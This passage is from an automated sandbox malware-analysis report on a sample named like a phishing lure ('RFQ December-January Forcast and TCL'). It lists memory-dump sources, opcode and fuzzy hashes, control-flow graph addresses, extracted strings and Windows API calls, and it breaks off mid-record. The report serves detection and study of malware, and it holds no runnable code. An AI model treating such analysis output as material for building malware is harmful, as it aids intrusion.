                                                                                                            • Opcode Fuzzy Hash: 5815315f370075e45e5fa84385fa36274d20221eac712211fb026fa47e6bdf7c
                                                                                                            • Instruction Fuzzy Hash: ADA19FB4E01228CFEB18DF6AC944B9DBBF2BB89300F14D0AAD408B7251DB745A85CF51
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992864771.0000000036B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b00000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 794fc85241a556b1bad262d006b5feebe75713710033c0aef3449d9b19b0edf4
                                                                                                            • Instruction ID: 0289faf5dac3fc9922c3941b321c33172cdb8233103869386b90a9df618991e8
                                                                                                            • Opcode Fuzzy Hash: 794fc85241a556b1bad262d006b5feebe75713710033c0aef3449d9b19b0edf4
                                                                                                            • Instruction Fuzzy Hash: 43A1AEB4E01228CFEB18CF6AC944B9DBBF2BB89300F14D4AAD508B7255DB745A85CF51
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992864771.0000000036B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b00000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0dd2ccf3c72f388b74a301acd591258ac711a6735ced855e6ef6ef4c8e59221b
                                                                                                            • Instruction ID: db2fc219be86020d12b4a200d386875e5c0873751733e53e6537c963657f951b
                                                                                                            • Opcode Fuzzy Hash: 0dd2ccf3c72f388b74a301acd591258ac711a6735ced855e6ef6ef4c8e59221b
                                                                                                            • Instruction Fuzzy Hash: 85A182B5E012288FEB14DF6AC944B9DBBF2BF89300F14D0AAD508B7255DB345A85CF51
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992864771.0000000036B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b00000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e84de6a98ae0b2f584ba3bc33ee35cca48389ad48846dd1885fdbf78a52d6cd8
                                                                                                            • Instruction ID: ca4e0ee319b9d64d502ea03c82ea133e2f47d4c18d90ec63185cd37eb6c713f3
                                                                                                            • Opcode Fuzzy Hash: e84de6a98ae0b2f584ba3bc33ee35cca48389ad48846dd1885fdbf78a52d6cd8
                                                                                                            • Instruction Fuzzy Hash: 2CA191B4E01228CFEB24CF6AC944B9DBBF2AF89300F14D5AAD408B7255DB745A85CF51
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992571187.0000000036A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36a50000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 55b9d44c97efbdde146254099ad96fd89b87219dd87e5cb6d23f1eaaff110ca5
                                                                                                            • Instruction ID: 6a23f22d43e2ebcd57e8c40f4b6f89f49f8d47e05aed33ec2a4dae41e3a39c3e
                                                                                                            • Opcode Fuzzy Hash: 55b9d44c97efbdde146254099ad96fd89b87219dd87e5cb6d23f1eaaff110ca5
                                                                                                            • Instruction Fuzzy Hash: 2D910170E00218CFEB10DFA8C984B9CBBB1FF49314F209269E949AB291DB759985CF54
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992864771.0000000036B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b00000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 71e9a71687d7aa27ecef584c491cd180d8150da33585081b818b4f0d9356f423
                                                                                                            • Instruction ID: def57eed5fb691a7e8cafe4af089e855425218ad86a9bb55eb8b8c9efea21617
                                                                                                            • Opcode Fuzzy Hash: 71e9a71687d7aa27ecef584c491cd180d8150da33585081b818b4f0d9356f423
                                                                                                            • Instruction Fuzzy Hash: 6C81E274E012188BEB14DFAAD99069DBFF2BF88314F24D529E414BB354DB369982CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992864771.0000000036B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b00000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 759214fd65f97e59af516c1aea08c1c254146961d49b95404647513daf204098
                                                                                                            • Instruction ID: bd767f7d7d73673d1b0050d34e32c65ea09813d0581b6056d5fa0a8ef3044131
                                                                                                            • Opcode Fuzzy Hash: 759214fd65f97e59af516c1aea08c1c254146961d49b95404647513daf204098
                                                                                                            • Instruction Fuzzy Hash: 9281E474E012088BDB14DFAAD99069DBFF2BF88314F24D529D414BB354DB369982CF51
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992864771.0000000036B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b00000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 25eaa60350e1c0ae20a097162c69d4b88c684c67ea03f283dd2e706eee72599b
                                                                                                            • Instruction ID: 95492ce8514088b0f94b52cecb9f0d3ca992a5ca6d7cf2aa01afc371057312e2
                                                                                                            • Opcode Fuzzy Hash: 25eaa60350e1c0ae20a097162c69d4b88c684c67ea03f283dd2e706eee72599b
                                                                                                            • Instruction Fuzzy Hash: 5C81A6B4E01628CFEB18CF6AC944B99BBF2AF89200F14C5EAD40CB7255DB745A85CF51
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992864771.0000000036B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b00000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5186f9a0084b57ae4b44b413bf446dc18a0edd32e5ba01954becc4b1d0b5b69d
                                                                                                            • Instruction ID: f75e4913649e2c595ca7e323e1c57cc5ae66285a8b20d52913e998b9e8c5cde1
                                                                                                            • Opcode Fuzzy Hash: 5186f9a0084b57ae4b44b413bf446dc18a0edd32e5ba01954becc4b1d0b5b69d
                                                                                                            • Instruction Fuzzy Hash: B971A175E01228CFDB68DF66C9847DDBBB2BF89301F1091AAD409BB254DB355A86CF40
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992864771.0000000036B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b00000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 25ed211a6c85e7349419f261d2706da74b678b2845903e60665c24af4078fb81
                                                                                                            • Instruction ID: 6c3f7c304c860f782213dfc13b5f758841f055d962ad5786300d060ee47acdaf
                                                                                                            • Opcode Fuzzy Hash: 25ed211a6c85e7349419f261d2706da74b678b2845903e60665c24af4078fb81
                                                                                                            • Instruction Fuzzy Hash: B87196B4E016288FEB58CF6AC944B9DBBF2AF89300F14D1AAD40CB7255DB344A85CF51
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992884626.0000000036B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b20000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 09c7952e2b6f67aa05d5431fc325fcc2421115df8edb9c667dd2df4a0057de9a
                                                                                                            • Instruction ID: bf224887de6132e83e89c1d2e4e9738efb0797ee5132be4e61313cab96d1e5b8
                                                                                                            • Opcode Fuzzy Hash: 09c7952e2b6f67aa05d5431fc325fcc2421115df8edb9c667dd2df4a0057de9a
                                                                                                            • Instruction Fuzzy Hash: 2B610674A1022ADFDB25DF64D950BADBBB2EB88301F1084A9990D77750DF365D82EF00
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992864771.0000000036B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b00000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 375d81b47d59a3054a1c4fe2836dbf4088d30702d940d088b73f5ea0601d4754
                                                                                                            • Instruction ID: b7a4f06f9af4fa01a720f720b62478cf441ff98985e984ada4ed24144e112cfe
                                                                                                            • Opcode Fuzzy Hash: 375d81b47d59a3054a1c4fe2836dbf4088d30702d940d088b73f5ea0601d4754
                                                                                                            • Instruction Fuzzy Hash: 94610874A10269DFDB25DF64D954BADBBB2FB88301F1084AA990A77354CF365D82DF00
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992864771.0000000036B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b00000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7fc74ee80266cba35150c08163ef44e711a32b34cdf0cb14be630ad7c74e8462
                                                                                                            • Instruction ID: 0688945277802f690184bc7c1333c4cdd767ad24dc6dc6a0328f4bea5404fcc7
                                                                                                            • Opcode Fuzzy Hash: 7fc74ee80266cba35150c08163ef44e711a32b34cdf0cb14be630ad7c74e8462
                                                                                                            • Instruction Fuzzy Hash: 054158B1E016188BEB58CF6BC9457C9FBF3AFC9200F04C1AAD50CA6265DB740A868F51
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992864771.0000000036B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b00000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 20c94102d24b59df8c3f38027fdb75eac91f95fb145f8453a775e92172614c20
                                                                                                            • Instruction ID: 25292a6cc76936c5127c2c681aba4127a0e3c2d8dadef0a398d5d2f714cadebd
                                                                                                            • Opcode Fuzzy Hash: 20c94102d24b59df8c3f38027fdb75eac91f95fb145f8453a775e92172614c20
                                                                                                            • Instruction Fuzzy Hash: E44149B1D016188BEB58CF6BC9457C9FAF3AFC9304F04C1AAD50CA6255DB740A868F51

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 0 1166b8-1166ed 1 1166f3-116716 0->1 2 116b1c-116b20 0->2 11 1167c4-1167c8 1->11 12 11671c-116729 1->12 3 116b22-116b36 2->3 4 116b39-116b47 2->4 9 116b49-116b5e 4->9 10 116bb8-116bcd 4->10 17 116b60-116b63 9->17 18 116b65-116b72 9->18 19 116bd4-116be1 10->19 20 116bcf-116bd2 10->20 15 116810-116819 11->15 16 1167ca-1167d8 11->16 24 116738 12->24 25 11672b-116736 12->25 21 116c2f 15->21 22 11681f-116829 15->22 16->15 36 1167da-1167f5 16->36 26 116b74-116bb5 17->26 18->26 27 116be3-116c1e 19->27 20->27 30 116c34-116c4d 21->30 22->2 28 11682f-116838 22->28 31 11673a-11673c 24->31 25->31 70 116c25-116c2c 27->70 34 116847-116853 28->34 35 11683a-11683f 28->35 31->11 38 116742-1167a4 31->38 34->30 41 116859-11685f 34->41 35->34 57 116803 36->57 58 1167f7-116801 36->58 82 1167a6 38->82 83 1167aa-1167c1 38->83 43 116865-116875 41->43 44 116b06-116b0a 41->44 55 116877-116887 43->55 56 116889-11688b 43->56 44->21 47 116b10-116b16 44->47 47->2 47->28 59 11688e-116894 55->59 56->59 60 116805-116807 57->60 58->60 59->44 63 11689a-1168a9 59->63 60->15 64 116809 60->64 68 116957-116982 call 116500 * 2 63->68 69 1168af 63->69 64->15 86 116988-11698c 68->86 87 116a6c-116a86 68->87 72 1168b2-1168c3 69->72 72->30 75 1168c9-1168db 72->75 75->30 77 1168e1-1168f9 75->77 140 1168fb call 116c98 77->140 141 1168fb call 116c88 77->141 81 116901-116911 81->44 85 116917-11691a 81->85 82->83 83->11 88 116924-116927 85->88 89 11691c-116922 85->89 86->44 91 116992-116996 86->91 87->2 109 116a8c-116a90 87->109 88->21 92 11692d-116930 88->92 89->88 89->92 94 116998-1169a5 91->94 95 1169be-1169c4 91->95 96 116932-116936 92->96 97 116938-11693b 92->97 112 1169b4 94->112 113 1169a7-1169b2 94->113 99 1169c6-1169ca 95->99 100 1169ff-116a05 95->100 96->97 98 116941-116945 96->98 97->21 97->98 98->21 101 11694b-116951 98->101 99->100 102 1169cc-1169d5 99->102 103 116a11-116a17 100->103 104 116a07-116a0b 100->104 101->68 101->72 107 1169e4-1169fa 102->107 108 1169d7-1169dc 102->108 110 116a23-116a25 103->110 111 116a19-116a1d 103->111 104->70 104->103 107->44 108->107 117 116a92-116a9c call 1153a8 109->117 118 116acc-116ad0 109->118 114 116a27-116a30 110->114 115 116a5a-116a5c 110->115 111->44 111->110 116 1169b6-1169b8 112->116 113->116 121 116a32-116a37 114->121 122 116a3f-116a55 114->122 115->44 123 116a62-116a69 115->123 116->44 116->95 117->118 128 116a9e-116ab3 117->128 118->70 125 116ad6-116ada 118->125 121->122 122->44 125->70 127 116ae0-116aed 125->127 131 116afc 127->131 132 116aef-116afa 127->132 128->118 137 116ab5-116aca 128->137 134 116afe-116b00 131->134 132->134 134->44 134->70 137->2 137->118 140->81 141->81
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970021636.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_110000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: (o^q$(o^q$(o^q$(o^q$(o^q$(o^q$,bq$,bq
                                                                                                            • API String ID: 0-1932283790
                                                                                                            • Opcode ID: 92550c66adca84a362d2ffc015471c0a137c16b9a329a8b52c773e5a4223643d
                                                                                                            • Instruction ID: da885b554163b97d38ead3034df09404c2ab860354e96a2e2df69b57a57d52a9
                                                                                                            • Opcode Fuzzy Hash: 92550c66adca84a362d2ffc015471c0a137c16b9a329a8b52c773e5a4223643d
                                                                                                            • Instruction Fuzzy Hash: 74125A30A002198FCB18CF68D984ADEBBF1FF48315F158569E859DB261DB32ED81CB90

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 585 36b20970-36b20a0f GetCurrentProcess 590 36b20a11-36b20a17 585->590 591 36b20a18-36b20a4c GetCurrentThread 585->591 590->591 592 36b20a55-36b20a89 GetCurrentProcess 591->592 593 36b20a4e-36b20a54 591->593 595 36b20a92-36b20aaa 592->595 596 36b20a8b-36b20a91 592->596 593->592 607 36b20aad call 36b20f31 595->607 608 36b20aad call 36b20b4f 595->608 596->595 599 36b20ab3-36b20ae2 GetCurrentThreadId 600 36b20ae4-36b20aea 599->600 601 36b20aeb-36b20b4d 599->601 600->601 607->599 608->599
                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 36B209FE
                                                                                                            • GetCurrentThread.KERNEL32 ref: 36B20A3B
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 36B20A78
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 36B20AD1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992884626.0000000036B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b20000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Current$ProcessThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 2063062207-0
                                                                                                            • Opcode ID: c2e555f6a722820a57399135fd71931d6b666b097c4a06839e5226087e9336d7
                                                                                                            • Instruction ID: 24edcedffabae58f049b9a89a5735e471cfab0416ab5ac66071de9e03da6f391
                                                                                                            • Opcode Fuzzy Hash: c2e555f6a722820a57399135fd71931d6b666b097c4a06839e5226087e9336d7
                                                                                                            • Instruction Fuzzy Hash: B15135B090034A8FDB04DFAAD948B9EBFF1EF89310F20845AE519A7261DB345945CF65

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 609 36b20980-36b20a0f GetCurrentProcess 613 36b20a11-36b20a17 609->613 614 36b20a18-36b20a4c GetCurrentThread 609->614 613->614 615 36b20a55-36b20a89 GetCurrentProcess 614->615 616 36b20a4e-36b20a54 614->616 618 36b20a92-36b20aaa 615->618 619 36b20a8b-36b20a91 615->619 616->615 630 36b20aad call 36b20f31 618->630 631 36b20aad call 36b20b4f 618->631 619->618 622 36b20ab3-36b20ae2 GetCurrentThreadId 623 36b20ae4-36b20aea 622->623 624 36b20aeb-36b20b4d 622->624 623->624 630->622 631->622
                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 36B209FE
                                                                                                            • GetCurrentThread.KERNEL32 ref: 36B20A3B
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 36B20A78
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 36B20AD1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992884626.0000000036B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b20000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Current$ProcessThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 2063062207-0
                                                                                                            • Opcode ID: 05077514d883ea449d6a2efefd611b9585392e96e01281ae49ff32b16fff8069
                                                                                                            • Instruction ID: bb6bc9a9c611258966fbf50696f30e2217d37ecc87c32c57475d66d8876bf90f
                                                                                                            • Opcode Fuzzy Hash: 05077514d883ea449d6a2efefd611b9585392e96e01281ae49ff32b16fff8069
                                                                                                            • Instruction Fuzzy Hash: F45124B0D0034A8FDB04DFAAC948B9EBBF1EF89314F208459E519B7260DB749985CF65

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 980 1119b8-111a13 984 111a35-111a84 980->984 985 111a15-111a34 980->985 989 111a86-111a8d 984->989 990 111a9f 984->990 991 111a96-111a9d 989->991 992 111a8f-111a94 989->992 994 111aa7 990->994 993 111aaa-111abe 991->993 992->993 996 111ac0-111ac7 993->996 997 111ad4-111adc 993->997 994->993 998 111ac9-111acb 996->998 999 111acd-111ad2 996->999 1000 111ade-111ae2 997->1000 998->1000 999->1000 1002 111b42-111b45 1000->1002 1003 111ae4-111af9 1000->1003 1004 111b47-111b5c 1002->1004 1005 111b8d-111b93 1002->1005 1003->1002 1011 111afb-111afe 1003->1011 1004->1005 1015 111b5e-111b62 1004->1015 1006 111b99-111b9b 1005->1006 1007 11268e 1005->1007 1006->1007 1009 111ba1-111ba6 1006->1009 1012 112693-1126dc 1007->1012 1013 11263c-112640 1009->1013 1014 111bac 1009->1014 1016 111b00-111b02 1011->1016 1017 111b1d-111b3b call 1102a8 1011->1017 1033 1126fa-1127b6 1012->1033 1034 1126de-1126f9 1012->1034 1019 112642-112645 1013->1019 1020 112647-11268d 1013->1020 1014->1013 1021 111b64-111b68 1015->1021 1022 111b6a-111b88 call 1102a8 1015->1022 1016->1017 1023 111b04-111b07 1016->1023 1017->1002 1019->1012 1019->1020 1021->1005 1021->1022 1022->1005 1023->1002 1027 111b09-111b1b 1023->1027 1027->1002 1027->1017 1034->1033
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970021636.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_110000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Xbq$Xbq$Xbq$Xbq
                                                                                                            • API String ID: 0-2732225958
                                                                                                            • Opcode ID: 38ad34cdb9225bb2d63ffbdeb50e85b7056a0447ffb5e213bcd2916edf8c66e1
                                                                                                            • Instruction ID: 40a6c97e30b8db800b6aa9cb5787cf43fc6eae91bf56d3b2b31117c9d700a6b1
                                                                                                            • Opcode Fuzzy Hash: 38ad34cdb9225bb2d63ffbdeb50e85b7056a0447ffb5e213bcd2916edf8c66e1
                                                                                                            • Instruction Fuzzy Hash: 2EC18032D442299FCB8A9B788C842D97BB2FF9A300F4544B6D88597156F7304EC6CB65

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1915 114f00-114f22 1916 114f24-114f28 1915->1916 1917 114f38-114f43 1915->1917 1918 114f50-114f57 1916->1918 1919 114f2a-114f36 1916->1919 1920 114f49-114f4b 1917->1920 1921 114feb-115017 1917->1921 1922 114f77-114f80 1918->1922 1923 114f59-114f60 1918->1923 1919->1917 1919->1918 1924 114fe3-114fe8 1920->1924 1928 11501e-115076 1921->1928 2020 114f82 call 114ef0 1922->2020 2021 114f82 call 114f00 1922->2021 1923->1922 1925 114f62-114f6d 1923->1925 1927 114f73-114f75 1925->1927 1925->1928 1927->1924 1947 115085-115097 1928->1947 1948 115078-11507e 1928->1948 1929 114f88-114f8a 1930 114f92-114f9a 1929->1930 1931 114f8c-114f90 1929->1931 1934 114fa9-114fab 1930->1934 1935 114f9c-114fa1 1930->1935 1931->1930 1933 114fad-114fcc call 115968 1931->1933 1941 114fe1 1933->1941 1942 114fce-114fd7 1933->1942 1934->1924 1935->1934 1941->1924 2018 114fd9 call 119eb0 1942->2018 2019 114fd9 call 119f6d 1942->2019 1944 114fdf 1944->1924 1950 11512b-11512d 1947->1950 1951 11509d-1150a1 1947->1951 1948->1947 2016 11512f call 1152b8 1950->2016 2017 11512f call 1152c8 1950->2017 1952 1150b1-1150be 1951->1952 1953 1150a3-1150af 1951->1953 1959 1150c0-1150ca 1952->1959 1953->1959 1954 115135-11513b 1957 115147-11514e 1954->1957 1958 11513d-115143 1954->1958 1960 115145 1958->1960 1961 1151a9-115208 1958->1961 1964 1150f7-1150fb 1959->1964 1965 1150cc-1150db 1959->1965 1960->1957 1974 11520f-115233 1961->1974 1966 115107-11510b 1964->1966 1967 1150fd-115103 1964->1967 1976 1150eb-1150f5 1965->1976 1977 1150dd-1150e4 1965->1977 1966->1957 1971 11510d-115111 1966->1971 1969 115151-1151a2 1967->1969 1970 115105 1967->1970 1969->1961 1970->1957 1973 115117-115129 1971->1973 1971->1974 1973->1957 1984 115235-115237 1974->1984 1985 115239-11523b 1974->1985 1976->1964 1977->1976 1986 1152b1-1152b4 1984->1986 1987 11523d-115241 1985->1987 1988 11524c-11524e 1985->1988 1992 115243-115245 1987->1992 1993 115247-11524a 1987->1993 1994 115261-115267 1988->1994 1995 115250-115254 1988->1995 1992->1986 1993->1986 1999 115292-115294 1994->1999 2000 115269-115290 1994->2000 1996 115256-115258 1995->1996 1997 11525a-11525f 1995->1997 1996->1986 1997->1986 2003 11529b-11529d 1999->2003 2000->2003 2006 1152a3-1152a5 2003->2006 2007 11529f-1152a1 2003->2007 2009 1152a7-1152ac 2006->2009 2010 1152ae 2006->2010 2007->1986 2009->1986 2010->1986 2016->1954 2017->1954 2018->1944 2019->1944 2020->1929 2021->1929
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970021636.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_110000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Hbq$Hbq
                                                                                                            • API String ID: 0-4258043069
                                                                                                            • Opcode ID: f49c72da068730f026750f6cd202f628bbcdf4cc5fcffbf4c209c2a70ec573c7
                                                                                                            • Instruction ID: 6201dfbc0abc0f912188c578d8f6fdb45f399ab59c7f81ca56dabc3ab5d7ec57
                                                                                                            • Opcode Fuzzy Hash: f49c72da068730f026750f6cd202f628bbcdf4cc5fcffbf4c209c2a70ec573c7
                                                                                                            • Instruction Fuzzy Hash: 0EB1BC35304651CFDB199F38C894BAA7BA2AFC9701F258579E506CB3A1CB34CD82DB91

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 2023 115460-11546d 2024 115475-115477 2023->2024 2025 11546f-115473 2023->2025 2027 115688-11568f 2024->2027 2025->2024 2026 11547c-115487 2025->2026 2028 115690 2026->2028 2029 11548d-115494 2026->2029 2034 115695-1156cd 2028->2034 2030 115629-11562f 2029->2030 2031 11549a-1154a9 2029->2031 2032 115631-115633 2030->2032 2033 115635-115639 2030->2033 2031->2034 2035 1154af-1154be 2031->2035 2032->2027 2036 115686 2033->2036 2037 11563b-115641 2033->2037 2053 1156d6-1156da 2034->2053 2054 1156cf-1156d4 2034->2054 2041 1154c0-1154c3 2035->2041 2042 1154d3-1154d6 2035->2042 2036->2027 2037->2028 2039 115643-115646 2037->2039 2039->2028 2043 115648-11565d 2039->2043 2044 1154e2-1154e8 2041->2044 2045 1154c5-1154c8 2041->2045 2042->2044 2046 1154d8-1154db 2042->2046 2060 115681-115684 2043->2060 2061 11565f-115665 2043->2061 2055 115500-11551d 2044->2055 2056 1154ea-1154f0 2044->2056 2048 1155c9-1155cf 2045->2048 2049 1154ce 2045->2049 2050 1154dd 2046->2050 2051 11552e-115534 2046->2051 2065 1155d1-1155d7 2048->2065 2066 1155e7-1155f1 2048->2066 2057 1155f4-115601 2049->2057 2050->2057 2058 115536-11553c 2051->2058 2059 11554c-11555e 2051->2059 2062 1156e0-1156e2 2053->2062 2054->2062 2093 115526-115529 2055->2093 2063 1154f2 2056->2063 2064 1154f4-1154fe 2056->2064 2084 115603-115607 2057->2084 2085 115615-115617 2057->2085 2067 115540-11554a 2058->2067 2068 11553e 2058->2068 2087 115560-11556c 2059->2087 2088 11556e-115591 2059->2088 2060->2027 2069 115677-11567a 2061->2069 2070 115667-115675 2061->2070 2071 1156e4-1156f6 2062->2071 2072 1156f7-1156fe 2062->2072 2063->2055 2064->2055 2073 1155d9 2065->2073 2074 1155db-1155e5 2065->2074 2066->2057 2067->2059 2068->2059 2069->2028 2076 11567c-11567f 2069->2076 2070->2028 2070->2069 2073->2066 2074->2066 2076->2060 2076->2061 2084->2085 2090 115609-11560d 2084->2090 2091 11561b-11561e 2085->2091 2097 1155b9-1155c7 2087->2097 2088->2028 2099 115597-11559a 2088->2099 2090->2028 2094 115613 2090->2094 2091->2028 2095 115620-115623 2091->2095 2093->2057 2094->2091 2095->2030 2095->2031 2097->2057 2099->2028 2101 1155a0-1155b2 2099->2101 2101->2097
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970021636.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_110000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: ,bq$,bq
                                                                                                            • API String ID: 0-2699258169
                                                                                                            • Opcode ID: 2dcc3ba485c4e7fa4b18818a8ed5cddae9f7be640979e7da6edf05012ffc8157
                                                                                                            • Instruction ID: 127bafe3cdb52b88050e5ea3a8047b8d5c1564d3d771f5c7465b3585fe2c70ff
